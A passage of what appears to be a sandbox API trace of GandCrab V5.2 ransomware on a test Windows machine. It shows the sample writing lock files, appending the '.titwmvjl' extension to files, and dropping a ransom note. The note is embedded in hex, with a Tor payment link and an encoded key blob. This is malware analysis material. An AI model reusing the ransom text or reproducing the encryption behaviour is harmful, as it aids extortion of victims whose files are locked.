4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.223] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0072.223] CloseHandle (hObject=0x2cc) returned 1 [0072.224] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.224] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.224] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x21f)) [0072.224] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.225] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.225] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.225] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock") returned 115 [0072.225] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0072.226] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.226] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.226] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 91 [0072.226] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0072.226] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503278 [0072.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.227] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.227] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.227] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.227] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.227] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.227] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.227] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock" [0072.227] lstrlenW (lpString=".titwmvjl") returned 9 [0072.227] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock") returned 115 [0072.227] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.227] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 124 [0072.227] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a09d2ca4deb61a.lock") returned 115 [0072.227] lstrlenW (lpString=".lock") returned 5 [0072.227] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.227] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.228] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.228] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.228] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.228] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0072.228] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0072.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0072.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0072.228] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.228] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.229] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.229] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.229] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.229] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\TITWMVJL-DECRYPT.txt") returned 133 [0072.230] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0072.230] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x